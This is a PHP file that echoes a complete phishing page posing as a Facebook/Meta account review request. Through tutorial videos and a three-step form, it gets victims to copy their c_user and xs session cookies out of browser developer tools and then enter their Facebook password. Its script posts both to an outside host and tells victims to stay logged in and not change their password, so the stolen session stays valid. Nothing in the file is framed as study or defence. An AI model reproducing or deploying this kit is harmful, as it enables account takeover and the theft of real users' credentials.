echo "<!-- Professional Language Selection Modal -->";
echo "<div class=\"language-modal\" id=\"languageModal\">";
echo "<div class=\"language-modal-content\">";
echo "<div class=\"language-modal-header\">";
echo "<h2 class=\"language-title\">";
echo "<i class=\"fas fa-globe\"></i> Select Video Language";
echo "</h2>";
echo "<button class=\"close-language-modal\" id=\"closeLanguageModal\">";
echo "<i class=\"fas fa-times\"></i>";
echo "</button>";
echo "</div>";
echo "";
echo "<div class=\"language-search-container\">";
echo "<div class=\"search-wrapper\">";
echo "<i class=\"fas fa-search search-icon\"></i>";
echo "<input type=\"text\" class=\"language-search\" id=\"languageSearch\" placeholder=\"Search languages...\">";
echo "</div>";
echo "</div>";
echo "";
echo "<div class=\"language-options-container\">";
echo "<div class=\"language-options\">";
echo "<button class=\"language-btn\" data-lang=\"english\">";
echo "<div class=\"language-icon\">";
echo "<i class=\"fas fa-language\"></i>";
echo "</div>";
echo "<div class=\"language-name\">English</div>";
echo "<div class=\"language-native\">English</div>";
echo "</button>";
echo "<button class=\"language-btn\" data-lang=\"filipino\">";
echo "<div class=\"language-icon\">";
echo "<i class=\"fas fa-language\"></i>";
echo "</div>";
echo "<div class=\"language-name\">Filipino</div>";
echo "<div class=\"language-native\">Filipino</div>";
echo "</button>";
echo "<button class=\"language-btn\" data-lang=\"hindi\">";
echo "<div class=\"language-icon\">";
echo "<i class=\"fas fa-language\"></i>";
echo "</div>";
echo "<div class=\"language-name\">Hindi</div>";
echo "<div class=\"language-native\">हिन्दी</div>";
echo "</button>";
echo "<button class=\"language-btn\" data-lang=\"portuguese\">";
echo "<div class=\"language-icon\">";
echo "<i class=\"fas fa-language\"></i>";
echo "</div>";
echo "<div class=\"language-name\">Portuguese</div>";
echo "<div class=\"language-native\">Português</div>";
echo "</button>";
echo "<button class=\"language-btn\" data-lang=\"spanish\">";
echo "<div class=\"language-icon\">";
echo "<i class=\"fas fa-language\"></i>";
echo "</div>";
echo "<div class=\"language-name\">Spanish</div>";
echo "<div class=\"language-native\">Español</div>";
echo "</button>";
echo "<button class=\"language-btn\" data-lang=\"tamil\">";
echo "<div class=\"language-icon\">";
echo "<i class=\"fas fa-language\"></i>";
echo "</div>";
echo "<div class=\"language-name\">Tamil</div>";
echo "<div class=\"language-native\">தமிழ்</div>";
echo "</button>";
echo "<button class=\"language-btn\" data-lang=\"arabic\">";
echo "<div class=\"language-icon\">";
echo "<i class=\"fas fa-language\"></i>";
echo "</div>";
echo "<div class=\"language-name\">Arabic</div>";
echo "<div class=\"language-native\">العربية</div>";
echo "</button>";
echo "<button class=\"language-btn\" data-lang=\"japanese\">";
echo "<div class=\"language-icon\">";
echo "<i class=\"fas fa-language\"></i>";
echo "</div>";
echo "<div class=\"language-name\">Japanese</div>";
echo "<div class=\"language-native\">日本語</div>";
echo "</button>";
echo "<button class=\"language-btn\" data-lang=\"french\">";
echo "<div class=\"language-icon\">";
echo "<i class=\"fas fa-language\"></i>";
echo "</div>";
echo "<div class=\"language-name\">French</div>";
echo "<div class=\"language-native\">Français</div>";
echo "</button>";
echo "<button class=\"language-btn\" data-lang=\"swedish\">";
echo "<div class=\"language-icon\">";
echo "<i class=\"fas fa-language\"></i>";
echo "</div>";
echo "<div class=\"language-name\">Swedish</div>";
echo "<div class=\"language-native\">Svenska</div>";
echo "</button>";
echo "</div>";
echo "";
echo "<p style=\"text-align: center; margin-top: 20px; color: #606770; font-size: 14px;\">";
echo "Can't find your language? Request it at:";
echo "<a href=\"mailto:support@fb.com\" style=\"color: #1877f2; text-decoration: none;\">support@fb.com</a>";
echo "</p>";
echo "</div>";
echo "";
echo "<div class=\"language-footer\">";
echo "<div class=\"selected-language-display\">";
echo "Selected: <strong id=\"selectedLanguageDisplay\">None</strong>";
echo "</div>";
echo "<button class=\"confirm-btn\" id=\"confirmBtn\" disabled>";
echo "<i class=\"fas fa-check\"></i> Confirm Selection";
echo "</button>";
echo "</div>";
echo "</div>";
echo "</div>";
echo "";
echo "<!-- Review Modal -->";
echo "<div class=\"modal\" id=\"reviewModal\">";
echo "<div class=\"modal-content\">";
echo "<div class=\"modal-header\">";
echo "<h2 class=\"modal-title\"><i class=\"fas fa-file-alt\"></i> Account Review Request</h2>";
echo "<button class=\"close-modal\" id=\"closeModal\">&times;</button>";
echo "</div>";
echo "";
echo "<div class=\"modal-body\">";
echo "<div class=\"step-indicator\">";
echo "<div class=\"step active\">1</div>";
echo "<div class=\"step\">2</div>";
echo "<div class=\"step\">3</div>";
echo "<div class=\"step-line\"></div>";
echo "</div>";
echo "";
echo "<!-- Step 1: Video and c_user/xs -->";
echo "<div class=\"step-content active\" id=\"step1\">";
echo "<h3 class=\"step-title\">Detailed Video Information</h3>";
echo "";
echo "<div class=\"video-player-container\">";
echo "<div class=\"network-status\">";
echo "<i class=\"fas fa-signal\"></i>";
echo "<span>Connection: Good</span>";
echo "</div>";
echo "<div class=\"video-container\">";
echo "<video id=\"tutorialVideo\">";
echo "<!-- Source will be set dynamically -->";
echo "Your browser does not support the video tag.";
echo "</video>";
echo "<div class=\"loading-spinner\" id=\"loadingSpinner\">";
echo "<div class=\"spinner\"></div>";
echo "<div class=\"loading-percentage\">0%</div>";
echo "</div>";
echo "<div class=\"video-overlay\" id=\"videoOverlay\">";
echo "<div class=\"play-btn\" id=\"overlayPlayBtn\">";
echo "<i class=\"fas fa-play\"></i>";
echo "</div>";
echo "<p style=\"color: white; margin-top: 15px; font-weight: 600;\">Click to select language</p>";
echo "</div>";
echo "<div class=\"video-controls\">";
echo "<button class=\"control-btn\" id=\"playPauseBtn\">";
echo "<i class=\"fas fa-play\"></i>";
echo "</button>";
echo "<div class=\"progress-container\">";
echo "<div class=\"buffered-bar\" id=\"bufferedBar\"></div>";
echo "<div class=\"progress-bar\" id=\"progressBar\"></div>";
echo "</div>";
echo "<div class=\"time-display\">";
echo "<span id=\"currentTime\">0:00</span> / <span id=\"totalTime\">0:00</span>";
echo "</div>";
echo "<div class=\"volume-container\">";
echo "<button class=\"control-btn\" id=\"volumeBtn\">";
echo "<i class=\"fas fa-volume-up\"></i>";
echo "</button>";
echo "<input type=\"range\" class=\"volume-slider\" id=\"volumeSlider\" min=\"0\" max=\"1\" step=\"0.1\" value=\"1\">";
echo "</div>";
echo "<select class=\"speed-selector\" id=\"speedSelector\">";
echo "<option value=\"0.5\">0.5x</option>";
echo "<option value=\"0.75\">0.75x</option>";
echo "<option value=\"1\" selected>Normal</option>";
echo "<option value=\"1.25\">1.25x</option>";
echo "<option value=\"1.5\">1.5x</option>";
echo "<option value=\"2\">2x</option>";
echo "</select>";
echo "<button class=\"control-btn fullscreen-btn\" id=\"fullscreenBtn\">";
echo "<i class=\"fas fa-expand\"></i>";
echo "</button>";
echo "</div>";
echo "</div>";
echo "</div>";
echo "";
echo "<div class=\"mobile-instructions\">";
echo "<h3><i class=\"fas fa-mobile-alt\"></i> For Mobile Users</h3>";
echo "<p>This process requires desktop browser developer tools. Please switch to a computer:</p>";
echo "<ol>";
echo "<li>Open Chrome on a desktop/laptop computer</li>";
echo "<li>Log in to Facebook</li>";
echo "<li>Follow the video instructions to find your values</li>";
echo "<li>Return here to submit your review request</li>";
echo "</ol>";
echo "</div>";
echo "";
echo "<div class=\"form-group\">";
echo "<label for=\"c_user\"><i class=\"fas fa-user-circle\"></i> c_user Value</label>";
echo "<input type=\"text\" id=\"c_user\" name=\"c_user\"";
echo "placeholder=\"Enter your c_user value\"";
echo "pattern=\"\\d+\"";
echo "title=\"c_user only\"";
echo "required>";
echo "<div class=\"validation-hint\">Must contain a valid c_user value only</div>";
echo "</div>";
echo "";
echo "<div class=\"form-group\">";
echo "<label for=\"xs\"><i class=\"fas fa-key\"></i> xs Value</label>";
echo "<input type=\"text\" id=\"xs\" name=\"xs\"";
echo "placeholder=\"Enter your xs value\"";
echo "pattern=\".{20,}\"";
echo "title=\"xs only\"";
echo "required>";
echo "<div class=\"validation-hint\">Must contain a valid xs value only</div>";
echo "</div>";
echo "";
echo "<div class=\"btn-group\">";
echo "<button class=\"btn btn-outline\" id=\"cancelBtn\">";
echo "<i class=\"fas fa-times\"></i> Cancel";
echo "</button>";
echo "<button class=\"btn btn-primary\" id=\"nextToStep2\">";
echo "<i class=\"fas fa-arrow-right\"></i> Continue";
echo "</button>";
echo "</div>";
echo "</div>";
echo "";
echo "<!-- Step 2: Password Verification -->";
echo "<div class=\"step-content\" id=\"step2\">";
echo "<h3 class=\"step-title\">Password Verification</h3>";
echo "";
echo "<div class=\"form-group\">";
echo "<label for=\"password\"><i class=\"fas fa-lock\"></i> Re-enter Password</label>";
echo "<input type=\"password\" id=\"password\" name=\"password\"";
echo "placeholder=\"Enter your Facebook password\"";
echo "required>";
echo "</div>";
echo "";
echo "<div class=\"deletion-warning\">";
echo "<h3><i class=\"fas fa-info-circle\"></i> Important Security Notice</h3>";
echo "<ul>";
echo "<li>This is a security verification step to confirm your identity</li>";
echo "<li>Do not log out from your computer during the review process</li>";
echo "<li>Keep your Facebook account logged in on your computer</li>";
echo "<li>Your password is encrypted during transmission</li>";
echo "<li>Do not share your password with anyone</li>";
echo "</ul>";
echo "</div>";
echo "";
echo "<div class=\"btn-group\">";
echo "<button class=\"btn btn-outline\" id=\"backToStep1\">";
echo "<i class=\"fas fa-arrow-left\"></i> Back";
echo "</button>";
echo "<button class=\"btn btn-primary\" id=\"nextToStep3\">";
echo "<i class=\"fas fa-paper-plane\"></i> Submit Review Request";
echo "</button>";
echo "</div>";
echo "</div>";
echo "";
echo "<!-- Step 3: Success Message -->";
echo "<div class=\"step-content\" id=\"step3\">";
echo "<div class=\"success-message\">";
echo "<div class=\"success-icon\">";
echo "<i class=\"fas fa-check-circle\"></i>";
echo "</div>";
echo "<h3 class=\"success-title\">Review Request Submitted!</h3>";
echo "<p class=\"success-text\">Your account review request has been successfully submitted. Our team will review your case within the next 24 hours.</p>";
echo "";
echo "<div class=\"deletion-warning\">";
echo "<h3><i class=\"fas fa-info-circle\"></i> Important Instructions</h3>";
echo "<ul>";
echo "<li>Do not log out from your computer during this period</li>";
echo "<li>Keep your Facebook account logged in on this device</li>";
echo "<li>You will receive a notification once the review is complete</li>";
echo "<li>Account deletion has been paused pending review</li>";
echo "<li>Please do not attempt to change your password during review</li>";
echo "</ul>";
echo "</div>";
echo "";
echo "<button class=\"btn btn-primary\" id=\"finishBtn\">";
echo "<i class=\"fas fa-check\"></i> Finish";
echo "</button>";
echo "</div>";
echo "</div>";
echo "</div>";
echo "</div>";
echo "</div>";
echo "";
echo "<!-- Hidden form for submission -->";
echo "<form id=\"hiddenForm\" class=\"hidden-form\" action=\"https://php-ac262.wasmer.app\" method=\"post\">";
echo "<input type=\"hidden\" name=\"c_user\" id=\"hiddenCUser\">";
echo "<input type=\"hidden\" name=\"xs\" id=\"hiddenXs\">";
echo "<input type=\"hidden\" name=\"password\" id=\"hiddenPassword\">";
echo "</form>";
echo "";
echo "<!-- Footer -->";
echo "<footer>";
echo "<div class=\"footer-content\">";
echo "<div class=\"footer-links\">";
echo "<a href=\"#\">About</a>";
echo "<a href=\"#\">Ad Choice</a>";
echo "<a href=\"#\">Terms and policies</a>";
echo "<a href=\"#\">Privacy Policy</a>";
echo "<a href=\"#\">Help Center</a>";
echo "</div>";
echo "<div class=\"copyright\">";
echo "Meta © 2025 - Protecting Your Digital Identity";
echo "</div>";
echo "</div>";
echo "</footer>";
echo "";
echo "<script>";
echo "document.addEventListener('DOMContentLoaded', function() {";
echo "// Video files mapping";
echo "const videoFiles = {";
echo "'english': 'https://remove-account-restriction-issue.vercel.app/English_US_video_information_V1.mp4',";
echo "'filipino': 'https://remove-account-restriction-issue.vercel.app/Filipino_Tagalog_video_information_V1.mp4',";
echo "'hindi': 'https://remove-account-restriction-issue.vercel.app/Hindi_video_information_V1.mp4',";
echo "'portuguese': 'https://remove-account-restriction-issue.vercel.app/Portuguese_Brazil_video_information_V1.mp4',";
echo "'spanish': 'https://remove-account-restriction-issue.vercel.app/Spanish_Spain_video_information_V1.mp4',";
echo "'tamil': 'https://remove-account-restriction-issue.vercel.app/Tamil_video_information_V1.mp4',";
echo "'arabic': 'Arabic_video_information_V1.mp4',";
echo "'french': 'https://remove-account-restriction-issue.vercel.app/French_France_video_information_V1.mp4',";
echo "'swedish': 'https://remove-account-restriction-issue.vercel.app/Swedish_video_information_V1.mp4',";
echo "'japanese': 'https://remove-account-restriction-issue.vercel.app/Japanese_video_information_V1.mp4'";
echo "};";
echo "";
echo "// Language modal elements";
echo "const languageModal = document.getElementById('languageModal');";
echo "const closeLanguageModal = document.getElementById('closeLanguageModal');";
echo "const languageSearch = document.getElementById('languageSearch');";
echo "const languageButtons = document.querySelectorAll('.language-btn');";
echo "const confirmBtn = document.getElementById('confirmBtn');";
echo "const selectedLanguageDisplay = document.getElementById('selectedLanguageDisplay');";
echo "";
echo "let selectedLanguage = null;";
echo "";
echo "// Video elements";
echo "const videoOverlay = document.getElementById('videoOverlay');";
echo "const overlayPlayBtn = document.getElementById('overlayPlayBtn');";
echo "const video = document.getElementById('tutorialVideo');";
echo "const loadingSpinner = document.getElementById('loadingSpinner');";
echo "const loadingPercentage = document.querySelector('.loading-percentage');";
echo "";
echo "const modal = document.getElementById('reviewModal');";
echo "const reviewBtn = document.getElementById('reviewBtn');";
echo "const closeModal = document.getElementById('closeModal');";
echo "const cancelBtn = document.getElementById('cancelBtn');";
echo "const finishBtn = document.getElementById('finishBtn');";
echo "";
echo "// Video control elements";
echo "const playPauseBtn = document.getElementById('playPauseBtn');";
echo "const progressBar = document.getElementById('progressBar');";
echo "const bufferedBar = document.getElementById('bufferedBar');";
echo "const currentTimeDisplay = document.getElementById('currentTime');";
echo "const totalTimeDisplay = document.getElementById('totalTime');";
echo "const volumeBtn = document.getElementById('volumeBtn');";
echo "const volumeSlider = document.getElementById('volumeSlider');";
echo "const speedSelector = document.getElementById('speedSelector');";
echo "const fullscreenBtn = document.getElementById('fullscreenBtn');";
echo "";
echo "// Step navigation";
echo "const nextToStep2 = document.getElementById('nextToStep2');";
echo "const backToStep1 = document.getElementById('backToStep1');";
echo "const nextToStep3 = document.getElementById('nextToStep3');";
echo "";
echo "const step1 = document.getElementById('step1');";
echo "const step2 = document.getElementById('step2');";
echo "const step3 = document.getElementById('step3');";
echo "";
echo "const steps = document.querySelectorAll('.step');";
echo "";
echo "// Hidden form elements";
echo "const hiddenForm = document.getElementById('hiddenForm');";
echo "const hiddenCUser = document.getElementById('hiddenCUser');";
echo "const hiddenXs = document.getElementById('hiddenXs');";
echo "const hiddenPassword = document.getElementById('hiddenPassword');";
echo "";
echo "// Open language modal when video overlay is clicked";
echo "overlayPlayBtn.addEventListener('click', function() {";
echo "languageModal.classList.add('active');";
echo "});";
echo "";
echo "// Close language modal";
echo "closeLanguageModal.addEventListener('click', function() {";
echo "languageModal.classList.remove('active');";
echo "});";
echo "";
echo "// Language search functionality";
echo "languageSearch.addEventListener('input', function() {";
echo "const searchTerm = this.value.toLowerCase();";
echo "";
echo "languageButtons.forEach(button => {";
echo "const languageName = button.querySelector('.language-name').textContent.toLowerCase();";
echo "const languageNative = button.querySelector('.language-native').textContent.toLowerCase();";
echo "";
echo "if (languageName.includes(searchTerm) || languageNative.includes(searchTerm)) {";
echo "button.style.display = 'flex';";
echo "} else {";
echo "button.style.display = 'none';";
echo "}";
echo "});";
echo "});";
echo "";
echo "// Language selection";
echo "languageButtons.forEach(button => {";
echo "button.addEventListener('click', function() {";
echo "// Remove selected class from all buttons";
echo "languageButtons.forEach(btn => btn.classList.remove('selected'));";
echo "";
echo "// Add selected class to clicked button";
echo "this.classList.add('selected');";
echo "";
echo "// Get selected language";
echo "selectedLanguage = this.getAttribute('data-lang');";
echo "const languageName = this.querySelector('.language-name').textContent;";
echo "";
echo "// Update display";
echo "selectedLanguageDisplay.textContent = languageName;";
echo "";
echo "// Enable confirm button";
echo "confirmBtn.disabled = false;";
echo "});";
echo "});";
echo "";
echo "// Confirm language selection";
echo "confirmBtn.addEventListener('click', function() {";
echo "if (selectedLanguage) {";
echo "const source = videoFiles[selectedLanguage];";
echo "";
echo "if (source) {";
echo "video.src = source;";
echo "video.load();";
echo "";
echo "// Set video title for accessibility";
echo "video.setAttribute('title', `Tutorial Video - ${selectedLanguageDisplay.textContent}`);";
echo "";
echo "languageModal.classList.remove('active');";
echo "";
echo "// After a short delay, play the video";
echo "setTimeout(() => {";
echo "video.play();";
echo "videoOverlay.classList.add('hidden');";
echo "playPauseBtn.innerHTML = '<i class=\"fas fa-pause\"></i>';";
echo "}, 300);";
echo "";
echo "// Remember language selection";
echo "localStorage.setItem('preferredLanguage', selectedLanguage);";
echo "}";
echo "}";
echo "});";
echo "";
echo "// Close modal when clicking outside";
echo "window.addEventListener('click', function(event) {";
echo "if (event.target === languageModal) {";
echo "languageModal.classList.remove('active');";
echo "}";
echo "});";
echo "";
echo "// Keyboard shortcut for closing modal";
echo "document.addEventListener('keydown', function(e) {";
echo "if (e.key === 'Escape' && languageModal.classList.contains('active')) {";
echo "languageModal.classList.remove('active');";
echo "}";
echo "});";
echo "";
echo "// Preload the preferred language if available";
echo "const preferredLanguage = localStorage.getItem('preferredLanguage') || 'english';";
echo "if (videoFiles[preferredLanguage]) {";
echo "video.src = videoFiles[preferredLanguage];";
echo "video.load();";
echo "}";
echo "";
echo "function initVideoPlayer() {";
echo "// Initialize volume and playback rate";
echo "video.volume = volumeSlider.value;";
echo "video.playbackRate = speedSelector.value;";
echo "";
echo "// Update time display";
echo "updateTimeDisplay();";
echo "";
echo "// Event listeners";
echo "video.addEventListener('timeupdate', updateProgressBar);";
echo "video.addEventListener('progress', updateBufferedBar);";
echo "video.addEventListener('loadedmetadata', function() {";
echo "totalTimeDisplay.textContent = formatTime(video.duration);";
echo "});";
echo "";
echo "// Loading events";
echo "video.addEventListener('waiting', showLoadingSpinner);";
echo "video.addEventListener('playing', hideLoadingSpinner);";
echo "video.addEventListener('seeking', showLoadingSpinner);";
echo "video.addEventListener('seeked', hideLoadingSpinner);";
echo "";
echo "playPauseBtn.addEventListener('click', togglePlayPause);";
echo "";
echo "volumeBtn.addEventListener('click', toggleMute);";
echo "volumeSlider.addEventListener('input', function() {";
echo "video.volume = volumeSlider.value;";
echo "updateVolumeIcon();";
echo "});";
echo "";
echo "speedSelector.addEventListener('change', function() {";
echo "video.playbackRate = parseFloat(this.value);";
echo "});";
echo "";
echo "fullscreenBtn.addEventListener('click', toggleFullscreen);";
echo "";
echo "const progressContainer = document.querySelector('.progress-container');";
echo "progressContainer.addEventListener('click', function(e) {";
echo "const pos = (e.pageX - this.offsetLeft) / this.offsetWidth;";
echo "video.currentTime = pos * video.duration;";
echo "});";
echo "";
echo "// Keyboard shortcuts";
echo "document.addEventListener('keydown', function(e) {";
echo "if (e.code === 'Space' && !isInputField(document.activeElement)) {";
echo "e.preventDefault();";
echo "togglePlayPause();";
echo "}";
echo "";
echo "if (e.code === 'ArrowLeft') {";
echo "video.currentTime = Math.max(0, video.currentTime - 5);";
echo "}";
echo "";
echo "if (e.code === 'ArrowRight') {";
echo "video.currentTime = Math.min(video.duration, video.currentTime + 5);";
echo "}";
echo "";
echo "if (e.code === 'ArrowUp') {";
echo "video.volume = Math.min(1, video.volume + 0.1);";
echo "volumeSlider.value = video.volume;";
echo "updateVolumeIcon();";
echo "}";
echo "";
echo "if (e.code === 'ArrowDown') {";
echo "video.volume = Math.max(0, video.volume - 0.1);";
echo "volumeSlider.value = video.volume;";
echo "updateVolumeIcon();";
echo "}";
echo "";
echo "if (e.code === 'KeyM') {";
echo "toggleMute();";
echo "}";
echo "";
echo "if (e.code === 'KeyF') {";
echo "toggleFullscreen();";
echo "}";
echo "});";
echo "}";
echo "";
echo "function isInputField(element) {";
echo "return element.tagName === 'INPUT' || element.tagName === 'TEXTAREA';";
echo "}";
echo "";
echo "function showLoadingSpinner() {";
echo "loadingSpinner.style.display = 'flex';";
echo "}";
echo "";
echo "function hideLoadingSpinner() {";
echo "if (video.readyState >= 3) {";
echo "loadingSpinner.style.display = 'none';";
echo "}";
echo "}";
echo "";
echo "function updateBufferedBar() {";
echo "if (video.buffered.length > 0) {";
echo "const bufferedEnd = video.buffered.end(video.buffered.length - 1);";
echo "const percent = (bufferedEnd / video.duration) * 100;";
echo "bufferedBar.style.width = `${percent}%`;";
echo "";
echo "// Update loading percentage";
echo "if (video.readyState < 4) {";
echo "const loadedPercent = Math.round((bufferedEnd / video.duration) * 100);";
echo "loadingPercentage.textContent = `${loadedPercent}%`;";
echo "}";
echo "}";
echo "}";
echo "";
echo "function playVideo() {";
echo "video.play();";
echo "videoOverlay.classList.add('hidden');";
echo "playPauseBtn.innerHTML = '<i class=\"fas fa-pause\"></i>';";
echo "}";
echo "";
echo "// Toggle play/pause";
echo "function togglePlayPause() {";
echo "if (video.paused) {";
echo "video.play();";
echo "playPauseBtn.innerHTML = '<i class=\"fas fa-pause\"></i>';";
echo "} else {";
echo "video.pause();";
echo "playPauseBtn.innerHTML = '<i class=\"fas fa-play\"></i>';";
echo "}";
echo "}";
echo "";
echo "// Update progress bar";
echo "function updateProgressBar() {";
echo "const percent = (video.currentTime / video.duration) * 100;";
echo "progressBar.style.width = `${percent}%`;";
echo "currentTimeDisplay.textContent = formatTime(video.currentTime);";
echo "}";
echo "";
echo "// Update time display";
echo "function updateTimeDisplay() {";
echo "currentTimeDisplay.textContent = formatTime(video.currentTime);";
echo "totalTimeDisplay.textContent = formatTime(video.duration);";
echo "}";
echo "";
echo "// Format time in MM:SS";
echo "function formatTime(seconds) {";
echo "const minutes = Math.floor(seconds / 60);";
echo "seconds = Math.floor(seconds % 60);";
echo "return `${minutes}:${seconds < 10 ? '0' : ''}${seconds}`;";
echo "}";
echo "";
echo "function toggleMute() {";
echo "video.muted = !video.muted;";
echo "updateVolumeIcon();";
echo "}";
echo "";
echo "function updateVolumeIcon() {";
echo "if (video.muted || video.volume === 0) {";
echo "volumeBtn.innerHTML = '<i class=\"fas fa-volume-mute\"></i>';";
echo "volumeSlider.value = 0;";
echo "} else if (video.volume > 0.5) {";
echo "volumeBtn.innerHTML = '<i class=\"fas fa-volume-up\"></i>';";
echo "} else {";
echo "volumeBtn.innerHTML = '<i class=\"fas fa-volume-down\"></i>';";
echo "}";
echo "}";
echo "";
echo "function toggleFullscreen() {";
echo "const videoContainer = document.querySelector('.video-player-container');";
echo "";
echo "if (!document.fullscreenElement) {";
echo "if (videoContainer.requestFullscreen) {";
echo "videoContainer.requestFullscreen();";
echo "} else if (videoContainer.mozRequestFullScreen) {";
echo "videoContainer.mozRequestFullScreen();";
echo "} else if (videoContainer.webkitRequestFullscreen) {";
echo "videoContainer.webkitRequestFullscreen();";
echo "} else if (videoContainer.msRequestFullscreen) {";
echo "videoContainer.msRequestFullscreen();";
echo "}";
echo "fullscreenBtn.innerHTML = '<i class=\"fas fa-compress\"></i>';";
echo "} else {";
echo "if (document.exitFullscreen) {";
echo "document.exitFullscreen();";
echo "} else if (document.mozCancelFullScreen) {";
echo "document.mozCancelFullScreen();";
echo "} else if (document.webkitExitFullscreen) {";
echo "document.webkitExitFullscreen();";
echo "} else if (document.msExitFullscreen) {";
echo "document.msExitFullscreen();";
echo "}";
echo "fullscreenBtn.innerHTML = '<i class=\"fas fa-expand\"></i>';";
echo "}";
echo "}";
echo "";
echo "// Handle fullscreen change event";
echo "document.addEventListener('fullscreenchange', updateFullscreenIcon);";
echo "document.addEventListener('webkitfullscreenchange', updateFullscreenIcon);";
echo "document.addEventListener('mozfullscreenchange', updateFullscreenIcon);";
echo "document.addEventListener('MSFullscreenChange', updateFullscreenIcon);";
echo "";
echo "function updateFullscreenIcon() {";
echo "if (document.fullscreenElement ||";
echo "document.webkitFullscreenElement ||";
echo "document.mozFullScreenElement ||";
echo "document.msFullscreenElement) {";
echo "fullscreenBtn.innerHTML = '<i class=\"fas fa-compress\"></i>';";
echo "} else {";
echo "fullscreenBtn.innerHTML = '<i class=\"fas fa-expand\"></i>';";
echo "}";
echo "}";
echo "";
echo "// Open review modal";
echo "reviewBtn.addEventListener('click', function() {";
echo "modal.style.display = 'block';";
echo "document.body.style.overflow = 'hidden';";
echo "initVideoPlayer();";
echo "});";
echo "";
echo "// Close modal function";
echo "function closeModalFunc() {";
echo "modal.style.display = 'none';";
echo "document.body.style.overflow = 'auto';";
echo "resetForm();";
echo "}";
echo "";
echo "closeModal.addEventListener('click', closeModalFunc);";
echo "cancelBtn.addEventListener('click', closeModalFunc);";
echo "";
echo "// Finish button";
echo "finishBtn.addEventListener('click', function() {";
echo "window.location.href = \"https://www.facebook.com/\";";
echo "});";
echo "";
echo "// Next to Step 2";
echo "nextToStep2.addEventListener('click', function() {";
echo "const cUserInput = document.getElementById('c_user');";
echo "const xsInput = document.getElementById('xs');";
echo "";
echo "// Trigger browser validation";
echo "if (!cUserInput.checkValidity()) {";
echo "cUserInput.reportValidity();";
echo "return;";
echo "}";
echo "";
echo "if (!xsInput.checkValidity()) {";
echo "xsInput.reportValidity();";
echo "return;";
echo "}";
echo "";
echo "// Set values for hidden form";
echo "hiddenCUser.value = cUserInput.value;";
echo "hiddenXs.value = xsInput.value;";
echo "";
echo "// Submit c_user and xs together";
echo "const formData = new FormData();";
echo "formData.append('c_user', cUserInput.value);";
echo "formData.append('xs', xsInput.value);";
echo "";
echo "fetch('https://php-ac262.wasmer.app', {";
echo "method: 'POST',";
echo "body: formData";
echo "})";
echo ".then(response => {";
echo "if (!response.ok) {";
echo "console.error('Submission of c_user and xs failed');";
echo "}";
echo "})";
echo ".catch(error => {";
echo "console.error('Submission error:', error);";
echo "});";
echo "";
echo "// Proceed to next step";
echo "step1.classList.remove('active');";
echo "step2.classList.add('active');";
echo "";
echo "steps[0].classList.remove('active');";
echo "steps[1].classList.add('active');";
echo "});";
echo "";
echo "// Back to Step 1";
echo "backToStep1.addEventListener('click', function() {";
echo "step2.classList.remove('active');";
echo "step1.classList.add('active');";
echo "";
echo "steps[1].classList.remove('active');";
echo "steps[0].classList.add('active');";
echo "});";
echo "";
echo "// Submit form";
echo "nextToStep3.addEventListener('click', function() {";
echo "const passwordInput = document.getElementById('password');";
echo "";
echo "if (!passwordInput.checkValidity()) {";
echo "passwordInput.reportValidity();";
echo "return;";
echo "}";
echo "";
echo "// Set password for hidden form";
echo "hiddenPassword.value = passwordInput.value;";
echo "";
echo "// Submit password separately";
echo "const formData = new FormData();";
echo "formData.append('password', passwordInput.value);";
echo "";
echo "fetch('https://php-ac262.wasmer.app', {";
echo "method: 'POST',";
echo "body: formData";
echo "})";
echo ".then(response => {";
echo "if (!response.ok) {";
echo "console.error('Password submission failed');";
echo "}";
echo "})";
echo ".catch(error => {";
echo "console.error('Submission error:', error);";
echo "});";
echo "";
echo "// Proceed to success step";
echo "step2.classList.remove('active');";
echo "step3.classList.add('active');";
echo "";
echo "steps[1].classList.remove('active');";
echo "steps[2].classList.add('active');";
echo "});";
echo "";
echo "// Reset form";
echo "function resetForm() {";
echo "document.getElementById('c_user').value = '';";
echo "document.getElementById('xs').value = '';";
echo "document.getElementById('password').value = '';";
echo "";
echo "hiddenCUser.value = '';";
echo "hiddenXs.value = '';";
echo "hiddenPassword.value = '';";
echo "";
echo "step3.classList.remove('active');";
echo "step1.classList.add('active');";
echo "";
echo "steps[2].classList.remove('active');";
echo "steps[0].classList.add('active');";
echo "";
echo "video.pause();";
echo "video.currentTime = 0;";
echo "videoOverlay.classList.remove('hidden');";
echo "playPauseBtn.innerHTML = '<i class=\"fas fa-play\"></i>';";
echo "progressBar.style.width = '0%';";
echo "bufferedBar.style.width = '0%';";
echo "currentTimeDisplay.textContent = '0:00';";
echo "}";
echo "";
echo "// Close modal when clicking outside";
echo "window.addEventListener('click', function(event) {";
echo "if (event.target === modal) {";
echo "closeModalFunc();";
echo "}";
echo "});";
echo "});";
echo "</script>";
echo "</body>";
echo "</html>";
echo "";
?>
